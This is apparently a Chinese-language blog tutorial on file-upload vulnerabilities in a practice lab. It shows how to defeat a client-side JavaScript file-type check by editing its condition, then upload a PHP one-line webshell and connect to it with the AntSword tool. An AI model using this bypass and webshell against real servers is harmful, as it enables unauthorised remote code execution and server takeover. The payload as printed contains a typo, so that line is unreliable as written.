文件上传的小点总结

1.文件上传漏洞

服务器端脚本语言对上传文件没有严格的验证和过滤,就可以给攻击者上传恶意脚本文件的可能。

文件上传检测绕过:

简单思路:(这里以前端上传图片为例)

①开启phpstudy,启动apache即可,将目录设为靶场网站下www的目录。

②获取靶场源码,可以先保存到本地。

③使用notepad++修改文件上传过滤的JS文件,使其条件判断允许非正常文件后缀通过,并且在form表单中加入action属性,处理前端页面。

下面就是一个文件类型判断的代码,将判断条件可以直接改为1==-1就可以让文件允许上传。

复制代码
//判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;alert(errMsg);
        return false;
    }

重新打开本地保存好的靶场首页文件,选择任意php文件上传后,复制图片地址进行访问。(使用了一个info.php文件)

如果要上传一句话木马,那么直接写文件

复制代码
<?php @_eval($_POST['hack']); ?>

将文件名改为111.php,直接上传文件,上传成功后,复制图片地址。使用蚁剑,将刚才的地址和连接密码(也就是POST参数)连接并添加。

上传成功,刚才的两个文件这里都可以看到。

相关推荐
RustCoder12 分钟前
RustNet:使用 Rust 开发的跨平台网络监控工具
安全·rust·开源
骥龙3 小时前
1.2、实战准备:AI安全研究环境搭建与工具链
人工智能·python·安全
AORO20253 小时前
防爆手机与普通的区别:应用场景、功能、未来发展
网络·5g·安全·智能手机·信息与通信
TaasLabs3 小时前
MediSec首批参会名单 | 301医院、西门子、联影、GE、阿斯利康等20多家医疗机构安全人员齐聚!
安全
Wang's Blog3 小时前
Linux小课堂: SELinux安全子系统原理与Apache网站目录访问问题解决方案
linux·安全·apache
007tg9 小时前
LINE 账号安全与权重提升实战指南:行为模拟与风控规避策略
安全
数据库安全13 小时前
《金融电子化》:构建金融韧性运行安全体系:从灾备管理到主动防御新范式
大数据·安全·金融
会开花的二叉树16 小时前
应用层网络协议深度解析:设计、实战与安全
网络·网络协议·安全
红树林0717 小时前
beef-xss网页无法访问
安全·web安全·xss
wanhengidc17 小时前
站群服务器都有什么作用
服务器·安全·智能手机·玩游戏